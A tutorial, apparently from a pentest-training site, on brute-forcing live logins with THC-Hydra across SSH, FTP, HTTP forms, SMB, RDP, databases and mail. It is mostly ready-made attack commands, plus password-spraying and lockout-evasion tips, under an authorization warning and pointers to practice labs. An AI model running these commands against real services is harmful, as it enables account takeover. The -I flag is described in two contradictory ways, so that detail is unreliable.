What is Hydra?
Hydra (THC-Hydra) is a parallelised online login brute-forcing tool. Unlike john and hashcat which crack offline hashes, Hydra attacks live services over the network — it repeatedly attempts to authenticate using credentials from a wordlist until it finds a valid combination. It supports over 50 protocols including SSH, FTP, HTTP/HTTPS form logins, SMB, RDP, MySQL, PostgreSQL, VNC, Telnet, IMAP, POP3, and more.
The key strength of Hydra is speed through parallelism — it runs multiple login attempts simultaneously using configurable task threads, making it significantly faster than single-threaded alternatives. This also means it generates substantial traffic and will trigger account lockout policies and IDS alerts, so it should only be used against authorized targets.
Only use against services you own or have explicit written permission to test. Hydra generates a high volume of authentication requests and will be logged. Unauthorized use violates Pakistan's PECA 2016 and international cybercrime laws.
Installation
# Hydra is pre-installed on Kali Linux sudo apt update sudo apt install hydra -y # Check version hydra -h 2>&1 | head -5 # List all supported protocols/modules hydra -U http-post-form
Core Syntax
Understanding Hydra's syntax is essential — the structure is always hydra [options] target protocol. The -l / -L and -p / -P flags control single values vs wordlist files.
# Single username, wordlist of passwords hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET PROTOCOL # Wordlist of usernames, single password hydra -L users.txt -p password123 TARGET PROTOCOL # Both username and password from wordlists (slow — all combos) hydra -L users.txt -P /usr/share/wordlists/rockyou.txt TARGET PROTOCOL # Single username and single password (credential validation) hydra -l admin -p admin TARGET PROTOCOL
SSH Brute-Force
# SSH with username wordlist + rockyou hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40 # SSH with known username, password wordlist hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40 # SSH on a non-standard port hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40 -s 2222 # SSH — increase threads for speed (default 16) hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 32 ssh://10.10.10.40 # SSH — add delay between attempts to avoid lockout (seconds) hydra -l admin -P /usr/share/wordlists/rockyou.txt -W 3 ssh://10.10.10.40
FTP & Telnet
# FTP brute-force hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.40 # FTP verbose output (show each attempt) hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.40 -V # Telnet hydra -l admin -P /usr/share/wordlists/rockyou.txt telnet://10.10.10.40
HTTP Login Form Brute-Force
HTTP form attacks require the most configuration. You need the form's POST URL, the field names, and a string that appears in the response on a failed login.
# HTTP POST form — the format is: # hydra -l USER -P WORDLIST TARGET http-post-form "PATH:PARAMS:FAIL_STRING" # # PATH = the URL path of the login form action # PARAMS = the POST body with ^USER^ and ^PASS^ as placeholders # FAIL_STRING = a string present in the response when login FAILS # Example: basic login form hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.40 \ http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials" # DVWA login form example hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.40 \ http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed" # HTTP GET form (less common) hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.40 \ http-get-form "/login?user=^USER^&pass=^PASS^:F=Unauthorized" # HTTPS form (use https-post-form) hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.40 \ https-post-form "/login:user=^USER^&pass=^PASS^:F=Incorrect" # Pass a session cookie for forms behind authentication hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.40 \ http-post-form "/admin/login:user=^USER^&pass=^PASS^:F=Wrong:H=Cookie: PHPSESSID=abc123"
SMB, RDP & Other Protocols
# SMB (Windows file shares / domain auth) hydra -l Administrator -P /usr/share/wordlists/rockyou.txt smb://10.10.10.40 # RDP (Windows Remote Desktop) hydra -l Administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.40 # MySQL hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.10.10.40 # PostgreSQL hydra -l postgres -P /usr/share/wordlists/rockyou.txt postgres://10.10.10.40 # VNC (usually password only — no username) hydra -P /usr/share/wordlists/rockyou.txt vnc://10.10.10.40 # IMAP email hydra -l user@target.com -P /usr/share/wordlists/rockyou.txt imap://10.10.10.40 # POP3 email hydra -l user@target.com -P /usr/share/wordlists/rockyou.txt pop3://10.10.10.40
Output & Saving Results
# Save all found credentials to a file hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40 -o found_creds.txt # Verbose mode — print every attempt (slow but useful for debugging) hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40 -V # Show only valid credentials in output (suppress failures) hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40 -I # Resume a previously interrupted Hydra session hydra -R
Common Flags
-l <user>— Single username-L <file>— Username wordlist file-p <pass>— Single password-P <file>— Password wordlist file-s <port>— Target port (if non-standard)-t <tasks>— Number of parallel threads (default 16)-T <tasks>— Number of parallel connections per host-W <time>— Wait time in seconds between attempts-o <file>— Save output to file-V— Verbose mode — print every attempt-f— Stop after the first valid credential found-F— Stop on first valid pair per host-I— Ignore restore file, start fresh-R— Restore a previous session-e nsr— Try empty password (n), username as password (s), reverse (r)-u— Loop around users, not passwords (changes attack order)
Password Spraying vs Brute-Force
Standard brute-force (many passwords against one user) triggers account lockout quickly. Password spraying — trying one or two common passwords across many usernames — is far stealthier and more effective against real corporate environments. Use -u to loop usernames first.
# Password spray — try "Password1" against every user in list hydra -L users.txt -p "Password1" ssh://10.10.10.40 -t 4 -W 5 # Try empty password + username-as-password against all users hydra -L users.txt -p "" ssh://10.10.10.40 -e ns
Common Use Cases
- SSH brute-force after discovering an exposed port 22 during reconnaissance
- HTTP login form attacks on admin panels and web applications
- Testing default credentials on network devices (routers, switches, printers)
- SMB credential testing during internal network assessments
- CTF challenges involving login portals, SSH access, and FTP servers
- Password spray attacks against Active Directory over SMB or RDP
Further Reading
For HTTP form attacks, intercept the login request in Burp Suite first to get the exact field names and failure string before building your Hydra command — guessing the POST parameters is the most common source of errors. Pair Hydra with cewl and cupp for targeted wordlist generation when attacking specific individuals or organizations. Practice on TryHackMe's "Hydra" room and web login challenges on hackzia.site labs.